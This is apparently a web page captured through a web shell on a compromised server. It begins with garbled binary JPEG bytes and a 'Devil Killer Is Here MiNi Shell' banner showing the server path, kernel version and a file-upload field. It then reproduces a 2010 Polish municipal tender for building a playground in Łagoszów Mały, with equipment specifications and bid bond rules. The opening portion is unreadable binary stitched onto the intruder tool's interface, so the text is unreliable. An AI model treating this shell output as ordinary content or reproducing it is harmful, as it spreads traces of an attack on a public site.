JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100811/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100811/216689-N-2010.html

<p class="kh_header"><b>Jerzmanowa: Budowa placu zabaw w Łagoszowie Małym</b><br>
<b>Numer ogłoszenia: 216689 - 2010; data zamieszczenia: 11.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jerzmanowa , ul. Głogowska 7, 67-222 Jerzmanowa, woj. dolnośląskie, tel. 076 8382046, faks 076 8312119.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jerzmanowa.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa placu zabaw w Łagoszowie Małym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest:
Budowa placu zabaw w Łagoszowie Małym
w oparciu o dokumentację projektową sporządzoną przez Usługi Techniczne Jan Szponar, ul. Lompy 1, 67-200 Głogów
2. Przedmiot zamówienia należy wykonać w oparciu o:
a)	załącznik nr 6 - Projekt budowlany
b)	załącznik nr 7 -  Przedmiar robót;
3. Wykonawca udzieli gwarancji na okres: 36 miesięcy.
4. Na placu zabaw należy zamontować następujące elementy: zestaw zabawowy - szt. 1, piaskownica - szt. 1, huśtawka podwójna - 1 szt., huśtawka podwójna dla najmłodszych dzieci - 1 szt., huśtawka wagowa tygryski - 1 szt., karuzela - 1 szt., huśtawki typu sprężynowiec tygryski - 2 szt., ławki parkowe z oparciem - szt. 4, kosz na śmieci - sztuk 4, 
a)	elementy zamontowane na placu zabaw winny być równoważne z podanymi w dokumentacji projektowej. Za równoważne Zamawiający uzna te elementy, które spełniać będą warunki podane w opisie poniżej;
b)	Na wszystkie elementy montowane na placu zabaw Wykonawca udzieli minimum 36 miesiące gwarancji.
c)	Wszystkie montowane elementy powinny zawierać odpowiednie certyfikaty bezpieczeństwa, atesty wydane przez Państwowy Zakład Higieny.
d)	Połączenia konstrukcyjne wykonane przy pomocy ocynkowanych śrub zamkowych, podkładki i nakrętki ukryte w specjalnych gniazdach i zaślepione poliuretanowymi zaślepkami.
e)	Elementy metalowe (łańcuchy, obejmy itp.) są ocynkowane, ślizg zjeżdżalni wykonany z blachy nierdzewnej. Elementy urządzeń takie jak metalowe drążki i poręcze są malowane proszkowo. Wszystkie spawy, mocowania, połączenia powinny być gładkie, odpowiednio wyprofilowane, tak by spełniały wymogi bezpieczeństwa.
f)	Wszystkie mocowania do podłoża elementów montowanych na placu zabaw winny być mocowane za pomocą ocynkowanych stalowych kotew. Kotwy podnoszą belki o 10 cm ponad poziom gruntu. Kotwy mocowane są w betonie B20, natomiast do belek mocowane są w bezpieczny sposób i nie mają żadnych wystających elementów.
g)	Elementy montowane na placu zabaw wykonane z drewnianych belek o przekroju okrągłym i średnicy 120 mm. Belki wykonane z drewna iglastego bezrdzeniowe - z drewna tartacznego. Całość impregnowana ciśnieniowo. Belki barwione na kolor ciemna zieleń lub mahoniowy preparatem chroniącym drewno (w zależności od opisu zamieszczonego poniżej). Daszki i barierki malowane na kolor ciemna zieleń; 

Zestaw zabawowy - 2 wieże, 2 zjeżdżalnie, 4 pomosty, drabinka skośna oraz przeplotnia połączone w integralną całość. Konstrukcja w całości wykonana z drewnianych belek o średnicy 120 mm. Belki wykonane z drewna iglastego bezrdzeniowe - z drewna tartacznego. Całość impregnowana ciśnieniowo. Belki barwione na kolor mahoniowy. Zestaw montowany do podłoża na stalowych kotwach w ilości minimum 18 sztuk. W skład zestawu wchodzą następujące elementy:
a.	Wieża - 2 sztuki:
i.	pokryta dachem dwuspadowym z drewnianych belek w kolorze ciemna zieleń. Wieża o wysokości 3,00 m, szerokości 1,00 m i długości 1,00 m.;
ii.	pokryta dachem kopertowym z drewnianych belek w kolorze ciemna zieleń. Wieża o wysokości 3,30 m, szerokości 1,00 m i długości 1,00 m.
b.	zjeżdżalnia - 2 sztuki:
i.	wykonana z blachy nierdzewnej (blacha grubości 1,25 mm) o stalowych bokach malowanych proszkowo w kolorze RAL 1003, o wymiarach: długość 2,70 m, szerokości 0,55 m, o maksymalnej wysokości 1,10 m. Zjeżdżalnia zamontowana bezpośrednio do wieży z dachem kopertowym;
ii.	wykonana z blachy nierdzewnej (blacha grubości 1,25 mm) o stalowych bokach malowanych proszkowo w kolorze RAL 1003, o wymiarach: długość 2,40 m, szerokości 0,55 m, o maksymalnej wysokości 0,90 m. Zjeżdżalnia zamontowana bezpośrednio do wieży z dachem dwuspadowym;
c.	pomosty - szt. 4:
i.	pomost średni - wykonany z drewnianych belek - o wymiarach: długość 1,00 m, szerokość 1,00 m, wysokość maksymalna 1,60 m. Pomost zamontowany  jest bezpośrednio do wieży z dachem kopertowym;
ii.	pomost niski - wykonany z drewnianych belek - o wymiarach: długość 1,00 m, szerokość 1,00 m, wysokość maksymalna 0,55 m. Pomost zamontowany  jest bezpośrednio do pomostu średniego;
iii.	pomost skośny krótki - wykonany z drewnianych belek - o wymiarach: długość 1,30 m, szerokość 1,00 m i wysokość 0,50 m. pomost zamontowany przed pomostem niskim;
iv.	pomost wiszący - zamontowany pomiędzy wieżą z dachem dwuspadowym a pomostem średnim. Wykonany z drewnianych belek o wymiarach długość 2,50 m, szerokość od 1,10 m do 1,20 m i wysokości maksymalnej 1,40 m;
d.	przeplotnia - wykonana w całości z drewnianych belek. Belki stanowiące ramę przeplotni w kolorze mahoniowym. Wewnątrz ramy przeplotni zamontowano 3 belki pionowe i 3 belki poziome w kolorze ciemna zieleń w równej odległości od siebie - wyglądem przypominające kratę. Wymiary przeplotni: długość od 1,90 m do 2,10 m, szerokość od 0,18 m do 0,20 m, wysokość od 1,90 m do 2,10 m. 
e.	drabinka skośna - wykonana z drewnianych belek w kolorze mahoniowym. Belki montowane poziomo w kolorze ciemna zieleń w ilości 6 sztuk z każdej strony w równej odległości od siebie. Drabinka o długości 1,90 m, szerokości 1,00 m i maksymalnej wysokości 2,10 m. Drabinka skośna przypomina kształtem odwróconą literę V. 

Wymiary zestawu 7,50 m x 6,50 m, z przewidywaną strefą bezpieczeństwa o wymiarach 11,50 m x 9,50 m i maksymalnej wysokości zestawu 3,30 m.

Piaskownica - szt. 1 - stawiana wolno na podłożu, stabilizowana przez piasek wysypany do środka. Piaskownica bez dna. Piaskownica 6-boczna, wykonana w całości z okrągłych belek drewnianych o średnicy 120 mm, barwiona na kolor mahoniowy. Wysokość ścianek 32 cm + grubość deski siedziska 2 cm w kolorze ciemna zieleń. Ścianki w pionie łączone gwoździami, w poziomie na rogach skręcone jedną długą śrubą. Długość boku - 1,6m każdy.

Huśtawka podwójna - szt.1 - konstrukcja z drewna okrągłego o średnicy 120 mm. Podzespoły metalowe ze stali nierdzewnej - łożyska ślizgowe, łańcuch z pręta o średnicy 6mm. Oba siedziska huśtawki wykonane z opon. Huśtawka wykonana z drewnianych belek barwionych na kolor mahoniowy. Wymiary huśtawki podwójnej: 3,70 x 2,00 m. Wysokość huśtawki 2,30 m, z przewidywaną strefą bezpieczeństwa o wymiarach 3,70 x 8,00 m. Huśtawka montowana na ocynkowanych, stalowych kotwach.

Huśtawka podwójna dla najmłodszych dzieci - szt. 1 - konstrukcja z drewna okrągłego o średnicy 120 mm. Podzespoły metalowe ze stali nierdzewnej - łożyska ślizgowe, łańcuch z pręta o średnicy 6mm. Oba siedziska huśtawki przeznaczone dla najmłodszych z dodatkowym zabezpieczeniem przed upadkiem, wykonane z tworzywa na stelażu aluminiowym lub stalowo-aluminiowym w kolorze czarno - niebiesko - czerwonym lub niebiesko - czerwonym. Huśtawka wykonana z drewnianych belek barwionych na kolor mahoniowy. Wymiary huśtawki podwójnej 3,70 m x 2,00 m wysokość 2,30 m wymiany strefy bezpieczeństwa 3,70 m x 8,00 m. Huśtawka montowana na ocynkowanych, stalowych kotwach.

Huśtawka typu konik (wagowa) dla dwóch osób - szt.1 - w całości wykonana z drewnianych belek okrągłych w kolorze mahoniowym, o średnicy 120 mm o wymiarach 3,00 m x 0,40 m z przewidywaną strefą bezpieczeństwa 5,00 m x 2,40 m. wysokość huśtawki  0,50 m. Siedziska w kolorze czerwonym wykonane z drewna, uchwyty do trzymania się podczas zabawy w kolorze żółtym osadzone w drewnianej konstrukcji w kształcie głowy tygrysa. Głowa tygrysa w kolorze pomarańczowym i malowanymi pręgami w kolorze czarnym lub ciemny brąz, głowy zamontowane w drewnianej belce przed siedziskiem. Huśtawka zamontowana na stalowych ocynkowanych kotwach.

Zabawka bujak typu sprężynowiec - szt. 2 - typu tygrysek - osadzone trwale w podłożu na stalowej sprężynie. Wykonane ze sklejki wodoodpornej pomalowanej wodnymi farbami akrylowymi na jaskrawe kolory. W zabawkach - w kształcie tygryska - zamontowane są uchwyty do bezpiecznej zabawy - jedne umożliwiający dzieciom przytrzymanie się rączkami i drugie do podtrzymania nóg podczas zabawy. Wymiary: 0,90 m x 0,30 m; wymiary strefy bezpieczeństwa:  średnica 3,00 m, wysokość: 0,50 m. 

Karuzela z metalowymi poręczami. O średnicy 1,50 m, wysokość urządzenia 0,66 m, z przewidywaną minimalną strefą bezpieczeństwa o średnicy 2,60 m. platforma karuzeli wykonana z blachy aluminiowej, ryflowanej, antypoślizgowej o grubości 3 mm. 4 ramiona karuzeli wykonane z rury ze stali nierdzewnej, o średnicy 33 mm, pomalowane proszkowo na kolor np. żółty (fioletowy, różowy lub zielony). Ramiona karuzeli montowane są na obwodzie platformy karuzeli schodzą się do słupa zamontowanego na środku karuzeli. Słup ze stali konstrukcyjnej z rury o średnicy 88 mm i 60 mm, pomalowany proszkowo na kolor żółty (ewentualnie niebieski lub zielony). W karuzeli zastosować należy łożysko kulkowe. Karuzela powinna pomieścić do 8 osób.

Ławka z oparciem - szt. 4 - w całości wykonane z drewna impregnowanego montowane na stałe w podłożu (ocynkowane stalowe kotwy). Połączenia - śruby i wkręty do drewna. Belki drewniane oraz deski barwione na kolor mahoniowy. Ławka o wymiarach całkowitych 1,70 m x 0,60 m (lub 0,65 m) i wysokości od 0,80 m do 0,90m. Wysokość siedziska od 0,38m do 0,45 m.

Kosz na śmieci - szt. 4 - montowany na stałe w podłożu, poprzez wkopanie w ziemię na głębokość 70 cm. Wykonany z drewnianych belek impregnowanych ciśnieniowo barwionych na kolor mahoniowy, w środku umieszczony kubeł stalowy, ocynkowany wykonany z blachy o grubości 1 mm. Mocowania - wkręty i gwoździe..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9, 36.53.52.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda od Wykonawców wniesienia wadium.

2.Wadium wnosi się przed upływem składania ofert, tj. do dnia 26.08.2010r.                     do godz. 08:30

3.Zamawiający ustala kwotę wadium w wysokości: 2 000,00 zł (słownie: dwa tysiące złotych 00/100), w tym:

4.Wadium może być wnoszone w formie przewidzianej przez ustawę z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (Dz. U. z 2010r., Nr 113, poz.759) art.45 ust.6

5.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Urzędu Gminy Jerzmanowa 48 8646 0008 0000 0600 1906 0006 Bank Spółdzielczy w Jerzmanowej. Wniesienie wadium w terminie oznacza uznanie kwoty na rachunku bankowym do dnia 26.08.2010r. do godz. 08:30.

6.Zamawiający zobowiązuje się do przechowywania na rachunku bankowym wadium wniesionego w pieniądzu.

7.W przypadku, gdy Wykonawca wybrał wadium, w formie innej niż pieniądz, do oferty należy dołączyć kopię dokumentu. Oryginał dokumentu Wykonawca dostarcza w wyznaczonym terminie tj. do dnia 26.08.2010r. do godz. 08:30 do pokoju nr 7 w Urzędzie Gminy Jerzmanowa, ul. Głogowska 7, 67-222 Jerzmanowa.

8. Jeżeli Wykonawca nie wniesie wadium w terminie lub w sposób określony w Specyfikacji Istotnych Warunków Zamówienia spowoduje jego wykluczenie z postępowania na podstawie art. 24 ust.2 pkt 2 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (Dz. U. z 2010r., Nr 113, poz.759), a jego oferta zostanie uznana za odrzuconą na podstawie art.24 ust 4 tejże ustawy.

9. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (Dz. U. z 2010r., Nr 113, poz.759).

10. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesienia zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.

11. Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.

12. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust.1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (Dz. U. z 2010r., Nr 113, poz.759), jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.

13.Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.

14.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (Dz. U. z 2010r., Nr 113, poz.759), nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1 tejże ustawy lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.

15.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i wymienionych w Specyfikacji Istotnych Warunków Zamówienia) dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Spełnienie warunków udziału odnoszących się do posiadania niezbędnej wiedzy i doświadczenia, dysponowania osobami zdolnymi do wykonania zamówienia zostanie ocenione według poniższych zasad :

a) udokumentowane należyte wykonanie, w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych polegających na wykonaniu co najmniej 2 placów zabaw z podaniem ich wartości, dat wykonania oraz odbiorców.
2. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i wymienionych w Specyfikacji Istotnych Warunków Zamówienia) dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.  Spełnienie warunków udziału odnoszących się do posiadania niezbędnej wiedzy i doświadczenia, dysponowania osobami zdolnymi do wykonania zamówienia zostanie ocenione według poniższych zasad :
a) dysponowanie, w celu wykonania zamówienia, przynajmniej 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi w zakresie branży budowlanej.
 
2. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i wymienionych w Specyfikacji Istotnych Warunków Zamówienia) dołączonych do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Zamawiający żąda wskazania przez Wykonawcę w ofercie zgodnie z art.36 ust.4 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień  publicznych (Dz. U. z 2010r., Nr 113, poz.759) części zamówienia, której wykonanie powierzy podwykonawcom. 2. W przypadku gdy Wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, Wykonawca winien wówczas przedstawić Zamawiającemu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
3. Poza wymienionymi dokumentami i oświadczeniami w skład oferty wchodzą:
a)  formularz ofertowy - załącznik nr 1 do niniejszej Specyfikacji Istotnych Warunków Zamówienia;
b) Wykonawca załączy do oferty kosztorys ofertowy sporządzony na podstawie dokumentacji projektowej, przedmiarów robót oraz kalkulacji własnej. 
4. Wykonawca do oferty może załączyć katalog produktów oferowanych do produkcji i sprzedaży, urządzania placów zabaw.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
